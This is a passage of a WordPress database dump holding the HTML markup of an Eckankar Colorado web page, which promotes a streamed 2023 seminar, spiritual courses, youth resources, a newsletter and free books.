src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242998,41196,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM 